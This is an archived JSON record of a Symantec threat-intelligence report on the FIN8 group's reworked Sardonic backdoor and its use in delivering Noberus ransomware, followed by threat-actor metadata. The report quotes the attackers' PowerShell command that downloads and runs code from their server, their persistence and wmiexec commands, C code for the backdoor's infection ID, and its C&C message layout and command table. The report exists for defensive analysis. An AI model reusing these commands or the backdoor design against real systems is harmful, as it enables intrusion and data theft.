{
	"id": "004140dd-d2ac-475a-b91c-60043f17fc11",
	"created_at": "2026-04-06T00:14:26.593767Z",
	"updated_at": "2026-04-10T03:35:53.19972Z",
	"deleted_at": null,
	"sha1_hash": "8648dd23fd4bcdbb6ce7bf4e074e6dcb85f12c6b",
	"title": "FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 71749,
	"plain_text": "FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware\r\nArchived: 2026-04-05 16:35:34 UTC\r\nSymantec’s Threat Hunter Team, a part of Broadcom, recently observed the Syssphinx (aka FIN8) cyber-crime\r\ngroup deploying a variant of the Sardonic backdoor to deliver the Noberus ransomware. \r\nWhile analysis of the backdoor revealed it to be part of the Sardonic framework previously used by the group, and\r\nanalyzed in a 2021 report from Bitdefender, it seems that most of the backdoor’s features have been altered to give\r\nit a new appearance. \r\nSyssphinx\r\nActive since at least January 2016, Syssphinx (aka FIN8) is a financially motivated cyber-crime group known for\r\ntargeting organizations in the hospitality, retail, entertainment, insurance, technology, chemicals, and finance\r\nsectors. \r\nThe group is known for utilizing so-called living-off-the-land tactics, making use of built-in tools and interfaces\r\nsuch as PowerShell and WMI, and abusing legitimate services to disguise its activity. Social engineering and\r\nspear-phishing are two of the group’s preferred methods for initial compromise.\r\nSyssphinx and Ransomware\r\nWhile Syssphinx initially specialized in point-of-sale (POS) attacks, in the past few years the group has been\r\nobserved using a number of ransomware threats in its attacks.\r\nIn June 2021, Syssphinx was seen deploying the Ragnar Locker ransomware onto machines it had compromised\r\nin a financial services company in the U.S. earlier in the year. The activity marked the first time the group was\r\nobserved using ransomware in its attacks. Ragnar Locker is developed by a financially motivated cyber-crime\r\ngroup Symantec calls Hornworm (aka Viking Spider). \r\nIn January 2022, a family of ransomware known as White Rabbit was linked to Syssphinx. A malicious URL\r\nlinked to White Rabbit attacks was also linked to Syssphinx. 
In addition, attacks involving White Rabbit used a\r\nvariant of the Sardonic backdoor, a known Syssphinx tool.\r\nIn December 2022, Symantec observed the group attempting to deploy the Noberus (aka ALPHV, BlackCat)\r\nransomware in attacks. Noberus is operated by a financially motivated cyber-crime group Symantec calls Coreid\r\n(aka Blackmatter, Carbon Spider, FIN7).\r\nThe Syssphinx group’s move to ransomware suggests the threat actors may be diversifying their focus in an effort\r\nto maximize profits from compromised organizations. \r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor\r\nPage 1 of 11\n\nBackdoors\r\nSyssphinx is known for taking extended breaks between attack campaigns in order to improve its tactics,\r\ntechniques, and procedures (TTPs). \r\nFor instance, since 2019, Syssphinx had used backdoor malware called Badhatch in attacks. Syssphinx updated\r\nBadhatch in December 2020 and then again in January 2021. Then in August 2021, Bitdefender researchers\r\npublished details of a new backdoor dubbed Sardonic and linked it to the same group. The C++-based Sardonic\r\nbackdoor has the ability to harvest system information and execute commands, and has a plugin system designed\r\nto load and execute additional malware payloads delivered as DLLs. \r\nThe Syssphinx attack observed by Symantec in December 2022, in which the attackers attempted to deploy the\r\nNoberus ransomware, involved similar techniques as a Syssphinx attack described by Bitdefender researchers in\r\n2021. \r\nHowever, the most recent attack had some key differences, including the final payload being the Noberus\r\nransomware and the use of a reworked backdoor.\r\nThe revamped Sardonic backdoor analyzed in this blog shares a number of features with the C++-based Sardonic\r\nbackdoor analyzed by Bitdefender. However, most of the backdoor’s code has been rewritten, such that it gains a\r\nnew appearance. 
Interestingly, the backdoor code no longer uses the C++ standard library and most of the object-oriented features have been replaced with a plain C implementation. \r\nIn addition, some of the reworkings look unnatural, suggesting that the primary goal of the threat actors could be\r\nto avoid similarities with previously disclosed details. For example, when sending messages over the network, the\r\noperation code specifying how to interpret the message has been moved after the variable part of the message, a\r\nchange that adds some complications to the backdoor logic.\r\nThis goal seemed limited to just the backdoor itself, as known Syssphinx techniques were still used. \r\nAttacker Activity\r\nDuring the December 2022 incident, the attackers connected with PsExec to execute the command “quser” in\r\norder to display the session details and then the following command to launch the backdoor: \r\npowershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient).DownloadString('https://37-10-71-215[.]nip[.]io:8443/7ea5fa')\r\nNext, the attackers connected to the backdoor to check details of the affected computer before executing the\r\ncommand to establish persistence. 
\r\npowershell -nop -ep bypass -c CSIDL_WINDOWS\\temp\\1.ps1 2BDf39983402C1E50e1d4b85766AcF7a\r\nThis resulted in a process similar to that described by Bitdefender.\r\npowershell.exe -nop -c [System.Reflection.Assembly]::Load(([WmiClass] 'root\\cimv2:System__Cls').Properties['Parameter'].Value);[a8E95540.b2ADc60F955]::c3B3FE9127a()\r\nThe next day, the attackers connected to the persistent backdoor, but paused after running a few basic commands.\r\nRoughly 30 minutes later, the activity resumed with the attackers using what looked like wmiexec.py from\r\nImpacket, which started a process to launch a new backdoor.\r\ncmd.exe /Q /c powershell -nop -ep bypass -c CSIDL_SYSTEM_DRIVE\\shvnc.ps1 1\u003e \\\\127.0.0.1\\ADMIN$\\__1671129123.2520242 2\u003e\u00261\r\nThis new backdoor was used by the attackers for the next few hours.\r\nInterestingly, the new backdoor PowerShell script uses a new file name and simplifies the command-line by\r\nremoving the decryption key argument. Switching the tools like this could indicate that the attackers are testing\r\nnew features, so we were curious to analyze this new sample in detail. \r\nTechnical Analysis\r\nOne difference between the attack described by Bitdefender and the recent attacks observed by Symantec is the\r\ntechnique used to deploy the backdoor. In our case, the backdoor is embedded (indirectly) into a PowerShell script\r\n(see Figure 1) used to infect target machines, while the variant documented by Bitdefender features intermediate\r\ndownloader shellcode that downloads and executes the backdoor. \r\nFigure 1. PowerShell script contains two .NET Loaders (32-bit and 64-bit), each with embedded\r\ninjector and backdoor\r\nPowerShell Script\r\nThe PowerShell script used by Syssphinx can be seen in Figure 2.\r\nFigure 2. PowerShell script used by Syssphinx\r\nThe intention of the first line of code is to delete the PowerShell script file itself. The second line checks the\r\narchitecture of the current process and picks the 32-bit or 64-bit version of the encoded .NET Loader as\r\nappropriate. The third line decodes the .NET Loader binary and loads it into the current process. Finally, the fourth\r\nline of code starts the main functionality of the .NET Loader, where the injector and backdoor are decrypted and\r\ncontrol is passed to the injector.\r\n.NET Loader\r\nThe .NET Loader is an obfuscated .NET DLL. The obfuscation shows features characteristic of ConfuserEx. \r\nThe .NET Loader contains two blobs, which it first decrypts with the RC4 algorithm using a hardcoded decryption\r\nkey before decompressing. The decompressed blobs are then copied into a contiguous chunk of memory. The\r\n.NET Loader then transfers control to the second blob (injector), passing the memory location and size of the first\r\nblob (backdoor) as parameters.\r\nInjector\r\nThe injector is in the form of shellcode and its entrypoint is shown in Figure 3.\r\nFigure 3. Injector entrypoint\r\nThe decrypt_dwords subroutine seen in Figure 3 decrypts a few dwords (marked as encrypted_dwords in Figure\r\n3) to reveal a short chunk of code. The revealed code is shown in Figure 4 and includes a decryption loop that\r\nlooks similar to the “shellcode decryption routine” described in Bitdefender’s report. \r\nFigure 4. Code revealed by the decrypt_dwords subroutine\r\nAfter the decryption loop completes execution, we can see the full logic of the entrypoint (Figure 5). \r\nFigure 5. Full logic of entrypoint\r\nThe purpose of the injector is to start the backdoor in a newly created WmiPrvSE.exe process. When creating the\r\nWmiPrvSE.exe process, the injector attempts to start it in session-0 (best effort) using a token stolen from the\r\nlsass.exe process. \r\nBackdoor\r\nThe Backdoor is also in the form of shellcode and its entrypoint looks similar to that of the injector entrypoint,\r\nwith the exception of polymorphism.\r\nInteractive sessions\r\nOne of the interesting features of the backdoor is related to interactive sessions, where the attacker runs cmd.exe\r\nor other interactive processes on the affected computer. Interestingly, the sample allows up to 10 such sessions to\r\nrun at the same time. In addition, when starting each individual process, the attacker may use a process token\r\nstolen from a specified process ID that is different for each session. \r\nExtensions\r\nAnother notable feature is that the backdoor supports three different formats to extend its functionality. 
\r\nThe first is with PE DLL plugins that the backdoor loads within its own process and then calls:\r\nexport \"Start\" (if present) on loading with the following arguments:\r\nlength of parameters array below\r\naddress of parameters array containing pointers to arguments received from the remote attacker\r\nbuffer of 1024 bytes to collect output for sending to the remote attacker\r\nexport \"End\" (if present) on unloading with the following arguments:\r\n0 (hardcoded)\r\nbuffer of 1024 bytes to collect output for sending to the remote attacker\r\nThe second format supported by the backdoor is in the form of shellcode, where each shellcode plugin executes in\r\nits own dedicated process. Before starting the shellcode, the backdoor creates a new process and writes into its\r\nmemory the shellcode blob preceded by a simple structure storing a copy of arguments received from the remote\r\nattacker. It then uses the QueueUserAPC API to execute the shellcode, such that the address of the mentioned\r\nstructure is passed as the first and only shellcode argument. To unload any shellcode plugin, the backdoor simply\r\nterminates the process associated with the specified plugin. \r\nFinally, the third format is also in the form of shellcode but with a different convention to pass the arguments. The\r\nbackdoor executes this shellcode in the context of the backdoor's main thread and no other commands are\r\naccepted until the shellcode returns. To execute the shellcode, the backdoor simply calls it as a subroutine passing\r\nfour arguments, each providing the address of the corresponding argument received from the remote attacker (the\r\nbackdoor appears to use 64-bit values when passing the addresses in case of 32-bit shellcode). 
\r\nNetwork communication\r\nWhen communicating with its command-and-control (C\u0026C) server, the backdoor exchanges messages of variable\r\nsize using the structure shown in Table 1.\r\nTable 1. Backdoor C\u0026C message structure\r\nOffset Size Description\r\n0 DWORD Header\r\n4 body_size BYTEs Body\r\n4 + body_size 8 BYTEs Footer\r\nThe size of the body field (body_size) can be determined from the content of the header field as explained in the\r\nfollowing sections.\r\nInitial message\r\nOnce the backdoor connects to its C\u0026C server, it sends the initial message of 0x10C bytes with:\r\nheader field value 0xFFFFFCC0 (hardcoded), and\r\nfooter field left uninitialized.\r\nThe body field of the initial message is 0x100 bytes and uses the structure shown in Table 2.\r\nTable 2. Body field structure of the initial message\r\nOffset Size Description\r\n0 DWORD The backdoor architecture, where value 0 indicates 32-bit shellcode and value 1 indicates 64-bit shellcode\r\n4 DWORD rc4_key_size\r\n8 0x25 BYTEs Random padding\r\n0x2D 0x20 BYTEs infection_id encrypted with the RC4 algorithm using rc4_key as the encryption key\r\n0x4D 0x5B BYTEs Padding\r\n0x88 rc4_key_size BYTEs rc4_key\r\n0x88 + rc4_key_size 0x100 - (0x88 + rc4_key_size) BYTEs Random padding\r\nThe size of the rc4_key field (rc4_key_size) is always 0x40 bytes.\r\nThe snippet shown below roughly demonstrates the method used by the backdoor to generate the infection_id.\r\nuint16_t sum_words(void *data, size_t size)\r\n{\r\n   uint16_t *words = data;\r\n   uint16_t sum = 0;\r\n   while (size \u003e= sizeof(*words)) {\r\n        size -= sizeof(*words);\r\n        sum += *words++;\r\n   }\r\n   return sum;\r\n}\r\nvoid mix(char *identifier, size_t identifier_size, char *seed, size_t seed_length)\r\n{\r\n   const char hex_digits[] = \"0123456789ABCDEF\";\r\n 
  size_t index = 1;\r\n   for (size_t position = 1; position \u003c identifier_size; position += 2) {\r\n        int value = index * ~(\r\n            seed[(index - 1) % seed_length]\r\n            + seed[(index % identifier_size) % seed_length]\r\n            + seed[((index + 1) % identifier_size) % seed_length]\r\n            + seed[((index + 2) % identifier_size) % seed_length]\r\n        );\r\n        ++index;\r\n        identifier[position - 1] = hex_digits[(value \u003e\u003e 4) \u0026 0x0f];\r\n        identifier[position] = hex_digits[value \u0026 0x0f];\r\n   }\r\n}\r\nvoid generate_infection_id(char *infection_id, size_t infection_id_size)\r\n{\r\n   CHAR computer_name[0x400] = {};\r\n   DWORD computer_name_size = sizeof(computer_name);\r\n   GetComputerNameA(computer_name, \u0026computer_name_size);\r\n   int cpu_info[4] = {};\r\n   __cpuid(cpu_info, 0);\r\n   DWORD volume_serial_number = 0;\r\n   GetVolumeInformationA(\"c:\\\\\", 0, 0, \u0026volume_serial_number, 0, 0, 0, 0);\r\n   char seed[0x410];\r\n   size_t seed_length = snprintf(seed, sizeof(seed), \"%s%hu%hu\",\r\n        computer_name,\r\n        sum_words(cpu_info, sizeof(cpu_info)),\r\n        sum_words(\u0026volume_serial_number, sizeof(volume_serial_number)));\r\n   mix(infection_id, infection_id_size, seed, seed_length);\r\n}\r\nOther messages\r\nFor all the communication that follows (incoming and outgoing), the backdoor uses the following method to\r\ndetermine the size of the body field (body_size):\r\nbody_size is 0x80 for each incoming message with a header field value of 0xFFFFFE78 (hardcoded), and\r\nbody_size is simply the value of the header field in all other cases.\r\nThe content of body and footer fields is encrypted with the RC4 algorithm using rc4_key as the 
encryption key.\r\nThe keystream is reused when encrypting each individual field. \r\nThe footer field is 8 bytes and, once decrypted, uses the structure shown in Table 3. \r\nTable 3. Decrypted footer field structure\r\nOffset Size Description\r\n0 DWORD\r\nIn case of outgoing messages, contains body_size value (redundant). In case of\r\nincoming messages, appears to represent used part of body field (but only some\r\nimplemented cases rely on that).\r\n4 DWORD message_type\r\nFinally, the structure of the decrypted body field varies depending on the message_type. \r\nRecognized commands\r\nThe backdoor has the ability to receive and carry out the commands listed in Table 4.\r\nTable 4. Commands recognized by the backdoor\r\nCommand\r\n(message_type)\r\nDescription\r\n0x24C Exits the backdoor by returning to the caller of the Backdoor entrypoint.\r\n0x404 Exits the backdoor and terminates the process where the backdoor executes.\r\n0x224 Drops arbitrary new file with content supplied by the remote attacker.\r\n0x1FC Exfiltrates content of arbitrary file to the remote attacker.\r\n0x2F0\r\nIn case the specified interactive session is not active yet, the backdoor attempts to create\r\na session that runs a new \"cmd.exe\" process. It then writes \"chcp 65001\" followed by the\r\nnewline to the standard input of the created process as the first command to execute.\r\nFinally, the backdoor reports the name of the affected computer (per GetComputerName\r\nAPI) to the remote attacker. 
In case the specified interactive session already exists, the\r\nbackdoor simply passes any data received from the remote attacker to the standard input\r\nof the active process that already runs in that session.\r\n0x184\r\nCreates or updates the specified interactive session to run an arbitrary new process, but\r\nusing a stolen token. The data received from the remote attacker is parsed to recognize\r\nthe following parameters: \"-i [TOKEN_ID]\" (required): process id to steal the token\r\nfrom, and \"-c [COMMAND_LINE]\" (optional): command line to execute, where the\r\nbackdoor uses \"cmd.exe\" if omitted.\r\n0x1AC Terminates any \"stolen token\" process that runs in the specified interactive session.\r\n0x1D4\r\nCloses the specified interactive session if it exists and terminates any processes running in\r\nthat session.\r\n0x274\r\nLoads a DLL plugin supplied by the remote attacker, where the attacker also provides an\r\narbitrary name to identify that plugin and also any arguments for the plugin initialization\r\nsubroutine. Any pre-existing DLL plugin identified by the same name gets unloaded first.\r\n0x29C Unloads the DLL plugin identified by the name specified by the remote attacker.\r\n0x4F4\r\nStarts a shellcode plugin supplied by the remote attacker, where the attacker also\r\nprovides an arbitrary name to identify that plugin, the process id to steal the token from, and\r\nalso arbitrary data to pass as the shellcode argument. Each shellcode plugin runs in a\r\nnewly created \"WmiPrvSE.exe\" process, which may use a token stolen from the\r\nspecified process (best effort). 
Any pre-existing shellcode plugin identified by the same\r\nname is disposed first by terminating its \"WmiPrvSE.exe\" process.\r\n0x454\r\nExecutes shellcode supplied by the remote attacker in the context of the current thread.\r\nThis is separate from plugin infrastructure and also uses a different convention for\r\npassing shellcode parameters.\r\nA Continued Threat \r\nSyssphinx continues to develop and improve its capabilities and malware delivery infrastructure, periodically\r\nrefining its tools and tactics to avoid detection. The group’s decision to expand from point-of-sale attacks to the\r\ndeployment of ransomware demonstrates the threat actors’ dedication to maximizing profits from victim\r\norganizations. The tools and tactics detailed in this report serve to underscore how this highly skilled financial\r\nthreat actor remains a serious threat to organizations.  \r\nProtection\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nNetwork indicators:\r\n37.10.71[.]215 – C\u0026C server\r\napi-cdn[.]net\r\ngit-api[.]com\r\napi-cdnw5[.]net\r\n104-168-237-21.sslip[.]io\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor"
	],
	"report_names": [
		"syssphinx-fin8-backdoor"
	],
	"threat_actors": [
		{
			"id": "3150bf4f-288a-44b8-ab48-0ced9b052a0c",
			"created_at": "2025-08-07T02:03:24.910023Z",
			"updated_at": "2026-04-10T02:00:03.713077Z",
			"deleted_at": null,
			"main_name": "GOLD HUXLEY",
			"aliases": [
				"CTG-6969 ",
				"FIN8 "
			],
			"source_name": "Secureworks:GOLD HUXLEY",
			"tools": [
				"Gozi ISFB",
				"Powersniff"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6f37e16f-64b2-4b9c-b5b4-08d0884660eb",
			"created_at": "2022-10-25T16:07:24.380872Z",
			"updated_at": "2026-04-10T02:00:04.966462Z",
			"deleted_at": null,
			"main_name": "Viking Spider",
			"aliases": [],
			"source_name": "ETDA:Viking Spider",
			"tools": [
				"Ragnar Locker",
				"RagnarLocker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5bdde906-0416-42ee-9100-5ebd95dda77a",
			"created_at": "2023-01-06T13:46:38.601977Z",
			"updated_at": "2026-04-10T02:00:03.035842Z",
			"deleted_at": null,
			"main_name": "FIN8",
			"aliases": [
				"ATK113",
				"G0061"
			],
			"source_name": "MISPGALAXY:FIN8",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b4ec06e5-60c9-4796-9f85-129c77d1652b",
			"created_at": "2023-01-06T13:46:39.21956Z",
			"updated_at": "2026-04-10T02:00:03.249407Z",
			"deleted_at": null,
			"main_name": "VIKING SPIDER",
			"aliases": [],
			"source_name": "MISPGALAXY:VIKING SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf",
			"created_at": "2023-01-06T13:46:38.405479Z",
			"updated_at": "2026-04-10T02:00:02.961112Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"ATK32",
				"G0046",
				"G0008",
				"Sangria Tempest",
				"ELBRUS",
				"GOLD NIAGARA",
				"Coreid",
				"Carbanak",
				"Carbon Spider",
				"JokerStash",
				"CARBON SPIDER"
			],
			"source_name": "MISPGALAXY:FIN7",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ed3810b7-141a-4ed0-8a01-6a972b80458d",
			"created_at": "2022-10-25T16:07:23.443259Z",
			"updated_at": "2026-04-10T02:00:04.602946Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider",
				"ELBRUS",
				"G0008",
				"Gold Waterfall",
				"Sangria Tempest"
			],
			"source_name": "ETDA:Carbanak",
			"tools": [
				"AVE_MARIA",
				"Agentemis",
				"AmmyyRAT",
				"Antak",
				"Anunak",
				"Ave Maria",
				"AveMariaRAT",
				"BABYMETAL",
				"BIRDDOG",
				"Backdoor Batel",
				"Batel",
				"Bateleur",
				"BlackMatter",
				"Boostwrite",
				"Cain \u0026 Abel",
				"Carbanak",
				"Cl0p",
				"Cobalt Strike",
				"CobaltStrike",
				"DNSMessenger",
				"DNSRat",
				"DNSbot",
				"DRIFTPIN",
				"DarkSide",
				"FOXGRABBER",
				"FlawedAmmyy",
				"HALFBAKED",
				"JS Flash",
				"KLRD",
				"MBR Eraser",
				"Mimikatz",
				"Nadrac",
				"Odinaff",
				"POWERPIPE",
				"POWERSOURCE",
				"PsExec",
				"SQLRAT",
				"Sekur",
				"Sekur RAT",
				"SocksBot",
				"SoftPerfect Network Scanner",
				"Spy.Agent.ORM",
				"TEXTMATE",
				"TeamViewer",
				"TiniMet",
				"TinyMet",
				"Toshliph",
				"VB Flash",
				"WARPRISM",
				"avemaria",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "72d09c17-e33e-4c2f-95db-f204848cc797",
			"created_at": "2022-10-25T15:50:23.832551Z",
			"updated_at": "2026-04-10T02:00:05.336787Z",
			"deleted_at": null,
			"main_name": "FIN8",
			"aliases": [
				"FIN8",
				"Syssphinx"
			],
			"source_name": "MITRE:FIN8",
			"tools": [
				"BADHATCH",
				"PUNCHBUGGY",
				"Ragnar Locker",
				"PUNCHTRACK",
				"dsquery",
				"Nltest",
				"Sardonic",
				"PsExec",
				"Impacket"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fc80a724-e567-457c-82bb-70147435e129",
			"created_at": "2022-10-25T16:07:23.624289Z",
			"updated_at": "2026-04-10T02:00:04.691643Z",
			"deleted_at": null,
			"main_name": "FIN8",
			"aliases": [
				"ATK 113",
				"G0061",
				"Storm-0288",
				"Syssphinx"
			],
			"source_name": "ETDA:FIN8",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BadHatch",
				"BlackCat",
				"Noberus",
				"PSVC",
				"PUNCHTRACK",
				"PoSlurp",
				"Powersniff",
				"PunchBuggy",
				"Ragnar Loader",
				"Ragnar Locker",
				"RagnarLocker",
				"Sardonic",
				"ShellTea"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bfded1cf-be73-44f9-a391-0751c9996f9a",
			"created_at": "2022-10-25T15:50:23.337107Z",
			"updated_at": "2026-04-10T02:00:05.252413Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"FIN7",
				"GOLD NIAGARA",
				"ITG14",
				"Carbon Spider",
				"ELBRUS",
				"Sangria Tempest"
			],
			"source_name": "MITRE:FIN7",
			"tools": [
				"Mimikatz",
				"AdFind",
				"JSS Loader",
				"HALFBAKED",
				"REvil",
				"PowerSploit",
				"CrackMapExec",
				"Carbanak",
				"Pillowmint",
				"Cobalt Strike",
				"POWERSOURCE",
				"RDFSNIFFER",
				"SQLRat",
				"Lizar",
				"TEXTMATE",
				"BOOSTWRITE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82",
			"created_at": "2022-10-25T16:07:23.619566Z",
			"updated_at": "2026-04-10T02:00:04.690061Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"APT-C-11",
				"ATK 32",
				"G0046",
				"Gold Niagara",
				"GrayAlpha",
				"ITG14",
				"TAG-CR1"
			],
			"source_name": "ETDA:FIN7",
			"tools": [
				"7Logger",
				"Agentemis",
				"Anubis Backdoor",
				"Anunak",
				"Astra",
				"BIOLOAD",
				"BIRDWATCH",
				"Bateleur",
				"Boostwrite",
				"CROWVIEW",
				"Carbanak",
				"Cobalt Strike",
				"CobaltStrike",
				"DICELOADER",
				"DNSMessenger",
				"FOWLGAZE",
				"HALFBAKED",
				"JSSLoader",
				"KillACK",
				"LOADOUT",
				"Lizar",
				"Meterpreter",
				"Mimikatz",
				"NetSupport",
				"NetSupport Manager",
				"NetSupport Manager RAT",
				"NetSupport RAT",
				"NetSupportManager RAT",
				"POWERPLANT",
				"POWERSOURCE",
				"RDFSNIFFER",
				"Ragnar Loader",
				"SQLRAT",
				"Sardonic",
				"Sekur",
				"Sekur RAT",
				"TEXTMATE",
				"Tirion",
				"VB Flash",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434466,
	"ts_updated_at": 1775792153,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8648dd23fd4bcdbb6ce7bf4e074e6dcb85f12c6b.pdf",
		"text": "https://archive.orkl.eu/8648dd23fd4bcdbb6ce7bf4e074e6dcb85f12c6b.txt",
		"img": "https://archive.orkl.eu/8648dd23fd4bcdbb6ce7bf4e074e6dcb85f12c6b.jpg"
	}
}